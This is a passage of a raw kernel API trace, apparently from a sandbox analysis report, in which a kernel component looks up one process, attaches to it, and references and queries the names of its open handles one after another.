KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.864] ObReferenceObjectByHandle (in: Handle=0x55c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069843290, HandleInformation=0x0) returned 0x0 [0264.864] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.864] PsReleaseProcessExitSynchronization () returned 0x2 [0264.864] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78193 [0264.864] ObQueryNameString (in: Object=0xffffe00069843290, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.864] ObfDereferenceObject (Object=0xffffe00069843290) returned 0x7fff [0264.864] IoCompleteRequest () returned 0x0 [0264.864] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.864] PsAcquireProcessExitSynchronization () returned 0x0 [0264.864] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.864] ObReferenceObjectByHandle (in: Handle=0x560, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069844da0, HandleInformation=0x0) returned 0x0 [0264.864] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.864] PsReleaseProcessExitSynchronization () returned 0x2 [0264.864] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78192 [0264.864] ObQueryNameString (in: Object=0xffffe00069844da0, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.864] ObfDereferenceObject (Object=0xffffe00069844da0) returned 0x7fff [0264.864] IoCompleteRequest () returned 0x0 [0264.864] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.864] PsAcquireProcessExitSynchronization () returned 0x0 [0264.864] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.864] ObReferenceObjectByHandle (in: Handle=0x564, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006983e3b0, HandleInformation=0x0) returned 0x0 [0264.864] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.864] PsReleaseProcessExitSynchronization () returned 0x2 [0264.864] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78191 [0264.864] ObQueryNameString (in: Object=0xffffe0006983e3b0, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.864] ObfDereferenceObject (Object=0xffffe0006983e3b0) returned 0x7fff [0264.864] IoCompleteRequest () returned 0x0 [0264.864] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.865] PsAcquireProcessExitSynchronization () returned 0x0 [0264.865] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.865] ObReferenceObjectByHandle (in: Handle=0x568, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069844730, HandleInformation=0x0) returned 0x0 [0264.865] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.865] PsReleaseProcessExitSynchronization () returned 0x2 [0264.865] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78190 [0264.865] ObQueryNameString (in: Object=0xffffe00069844730, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.865] ObfDereferenceObject (Object=0xffffe00069844730) returned 0x7fff [0264.865] IoCompleteRequest () returned 0x0 [0264.865] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.865] PsAcquireProcessExitSynchronization () returned 0x0 [0264.865] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.865] ObReferenceObjectByHandle (in: Handle=0x56c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069843690, HandleInformation=0x0) returned 0x0 [0264.865] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.865] PsReleaseProcessExitSynchronization () returned 0x2 [0264.865] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7818f [0264.865] ObQueryNameString (in: Object=0xffffe00069843690, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.865] ObfDereferenceObject (Object=0xffffe00069843690) returned 0x7fff [0264.865] IoCompleteRequest () returned 0x0 [0264.865] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.865] PsAcquireProcessExitSynchronization () returned 0x0 [0264.865] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.865] ObReferenceObjectByHandle (in: Handle=0x570, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069845f20, HandleInformation=0x0) returned 0x0 [0264.865] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.865] PsReleaseProcessExitSynchronization () returned 0x2 [0264.865] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7818e [0264.865] ObQueryNameString (in: Object=0xffffe00069845f20, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.865] ObfDereferenceObject (Object=0xffffe00069845f20) returned 0x7fff [0264.865] IoCompleteRequest () returned 0x0 [0264.865] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.865] PsAcquireProcessExitSynchronization () returned 0x0 [0264.865] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.865] ObReferenceObjectByHandle (in: Handle=0x574, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069845830, HandleInformation=0x0) returned 0x0 [0264.865] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.865] PsReleaseProcessExitSynchronization () returned 0x2 [0264.865] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7818d [0264.865] ObQueryNameString (in: Object=0xffffe00069845830, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.865] ObfDereferenceObject (Object=0xffffe00069845830) returned 0x7fff [0264.865] IoCompleteRequest () returned 0x0 [0264.865] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.865] PsAcquireProcessExitSynchronization () returned 0x0 [0264.865] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.865] ObReferenceObjectByHandle (in: Handle=0x578, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069843090, HandleInformation=0x0) returned 0x0 [0264.865] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.866] PsReleaseProcessExitSynchronization () returned 0x2 [0264.866] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7818c [0264.866] ObQueryNameString (in: Object=0xffffe00069843090, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.866] ObfDereferenceObject (Object=0xffffe00069843090) returned 0x7fff [0264.866] IoCompleteRequest () returned 0x0 [0264.866] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.866] PsAcquireProcessExitSynchronization () returned 0x0 [0264.866] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.866] ObReferenceObjectByHandle (in: Handle=0x57c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069843810, HandleInformation=0x0) returned 0x0 [0264.866] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.866] PsReleaseProcessExitSynchronization () returned 0x2 [0264.866] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7818b [0264.866] ObQueryNameString (in: Object=0xffffe00069843810, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.866] ObfDereferenceObject (Object=0xffffe00069843810) returned 0x7fff [0264.866] IoCompleteRequest () returned 0x0 [0264.866] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.866] PsAcquireProcessExitSynchronization () returned 0x0 [0264.866] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.866] ObReferenceObjectByHandle (in: Handle=0x580, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069845db0, HandleInformation=0x0) returned 0x0 [0264.866] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.866] PsReleaseProcessExitSynchronization () returned 0x2 [0264.866] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7818a [0264.866] ObQueryNameString (in: Object=0xffffe00069845db0, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.866] ObfDereferenceObject (Object=0xffffe00069845db0) returned 0x7fff [0264.866] IoCompleteRequest () returned 0x0 [0264.866] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.866] PsAcquireProcessExitSynchronization () returned 0x0 [0264.866] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.866] ObReferenceObjectByHandle (in: Handle=0x584, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698454c0, HandleInformation=0x0) returned 0x0 [0264.866] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.866] PsReleaseProcessExitSynchronization () returned 0x2 [0264.866] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78189 [0264.866] ObQueryNameString (in: Object=0xffffe000698454c0, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.866] ObfDereferenceObject (Object=0xffffe000698454c0) returned 0x7fff [0264.866] IoCompleteRequest () returned 0x0 [0264.866] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.866] PsAcquireProcessExitSynchronization () returned 0x0 [0264.866] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.866] ObReferenceObjectByHandle (in: Handle=0x588, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069846b20, HandleInformation=0x0) returned 0x0 [0264.866] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.866] PsReleaseProcessExitSynchronization () returned 0x2 [0264.866] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78188 [0264.866] ObQueryNameString (in: Object=0xffffe00069846b20, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.866] ObfDereferenceObject (Object=0xffffe00069846b20) returned 0x7fff [0264.866] IoCompleteRequest () returned 0x0 [0264.867] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.867] PsAcquireProcessExitSynchronization () returned 0x0 [0264.867] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.867] ObReferenceObjectByHandle (in: Handle=0x58c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069847f20, HandleInformation=0x0) returned 0x0 [0264.867] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.867] PsReleaseProcessExitSynchronization () returned 0x2 [0264.867] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78187 [0264.867] ObQueryNameString (in: Object=0xffffe00069847f20, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.867] ObfDereferenceObject (Object=0xffffe00069847f20) returned 0x7fff [0264.867] IoCompleteRequest () returned 0x0 [0264.867] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.867] PsAcquireProcessExitSynchronization () returned 0x0 [0264.867] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.867] ObReferenceObjectByHandle (in: Handle=0x590, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069847830, HandleInformation=0x0) returned 0x0 [0264.867] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.867] PsReleaseProcessExitSynchronization () returned 0x2 [0264.867] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78186 [0264.867] ObQueryNameString (in: Object=0xffffe00069847830, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.867] ObfDereferenceObject (Object=0xffffe00069847830) returned 0x7fff [0264.867] IoCompleteRequest () returned 0x0 [0264.867] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.867] PsAcquireProcessExitSynchronization () returned 0x0 [0264.867] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.867] ObReferenceObjectByHandle (in: Handle=0x594, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069845640, HandleInformation=0x0) returned 0x0 [0264.867] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.867] PsReleaseProcessExitSynchronization () returned 0x2 [0264.867] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78185 [0264.867] ObQueryNameString (in: Object=0xffffe00069845640, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.867] ObfDereferenceObject (Object=0xffffe00069845640) returned 0x7fff [0264.867] IoCompleteRequest () returned 0x0 [0264.867] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.867] PsAcquireProcessExitSynchronization () returned 0x0 [0264.867] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.867] ObReferenceObjectByHandle (in: Handle=0x598, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698434a0, HandleInformation=0x0) returned 0x0 [0264.867] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.867] PsReleaseProcessExitSynchronization () returned 0x2 [0264.867] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78184 [0264.867] ObQueryNameString (in: Object=0xffffe000698434a0, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.867] ObfDereferenceObject (Object=0xffffe000698434a0) returned 0x7fff [0264.867] IoCompleteRequest () returned 0x0 [0264.867] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.867] PsAcquireProcessExitSynchronization () returned 0x0 [0264.867] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.867] ObReferenceObjectByHandle (in: Handle=0x59c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069844090, HandleInformation=0x0) returned 0x0 [0264.867] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.868] PsReleaseProcessExitSynchronization () returned 0x2 [0264.868] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78183 [0264.868] ObQueryNameString (in: Object=0xffffe00069844090, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.868] ObfDereferenceObject (Object=0xffffe00069844090) returned 0x7fff [0264.868] IoCompleteRequest () returned 0x0 [0264.868] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.868] PsAcquireProcessExitSynchronization () returned 0x0 [0264.868] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.868] ObReferenceObjectByHandle (in: Handle=0x5a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069847ab0, HandleInformation=0x0) returned 0x0 [0264.868] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.868] PsReleaseProcessExitSynchronization () returned 0x2 [0264.868] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78182 [0264.868] ObQueryNameString (in: Object=0xffffe00069847ab0, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.868] ObfDereferenceObject (Object=0xffffe00069847ab0) returned 0x7fff [0264.868] IoCompleteRequest () returned 0x0 [0264.868] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.868] PsAcquireProcessExitSynchronization () returned 0x0 [0264.868] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.868] ObReferenceObjectByHandle (in: Handle=0x5a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069848090, HandleInformation=0x0) returned 0x0 [0264.868] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.868] PsReleaseProcessExitSynchronization () returned 0x2 [0264.868] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78181 [0264.868] ObQueryNameString (in: Object=0xffffe00069848090, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.868] ObfDereferenceObject (Object=0xffffe00069848090) returned 0x7fff [0264.868] IoCompleteRequest () returned 0x0 [0264.868] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.868] PsAcquireProcessExitSynchronization () returned 0x0 [0264.868] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.868] ObReferenceObjectByHandle (in: Handle=0x5b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.868] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.868] PsReleaseProcessExitSynchronization () returned 0x2 [0264.868] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78180 [0264.868] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.868] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18ffff [0264.868] IoCompleteRequest () returned 0x0 [0264.868] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.868] PsAcquireProcessExitSynchronization () returned 0x0 [0264.868] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.868] ObReferenceObjectByHandle (in: Handle=0x5d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.868] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.868] PsReleaseProcessExitSynchronization () returned 0x2 [0264.868] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7817f [0264.868] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.868] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18fffe [0264.869] IoCompleteRequest () returned 0x0 [0264.869] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.869] PsAcquireProcessExitSynchronization () returned 0x0 [0264.869] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.869] ObReferenceObjectByHandle (in: Handle=0x648, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069bf65b0, HandleInformation=0x0) returned 0x0 [0264.869] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.869] PsReleaseProcessExitSynchronization () returned 0x2 [0264.869] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7817e [0264.869] ObQueryNameString (in: Object=0xffffe00069bf65b0, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.869] ObfDereferenceObject (Object=0xffffe00069bf65b0) returned 0x7fff [0264.869] IoCompleteRequest () returned 0x0 [0264.869] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.869] PsAcquireProcessExitSynchronization () returned 0x0 [0264.869] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.869] ObReferenceObjectByHandle (in: Handle=0x67c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069d96c00, HandleInformation=0x0) returned 0x0 [0264.869] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.869] PsReleaseProcessExitSynchronization () returned 0x2 [0264.869] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7817d [0264.869] ObQueryNameString (in: Object=0xffffe00069d96c00, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.869] ObfDereferenceObject (Object=0xffffe00069d96c00) returned 0x7fff [0264.869] IoCompleteRequest () returned 0x0 [0264.869] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.869] PsAcquireProcessExitSynchronization () returned 0x0 [0264.869] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000b1b8e400) [0264.869] ObReferenceObjectByHandle (in: Handle=0x6ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.869] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.869] PsReleaseProcessExitSynchronization () returned 0x2 [0264.869] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x7817c [0264.869] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: 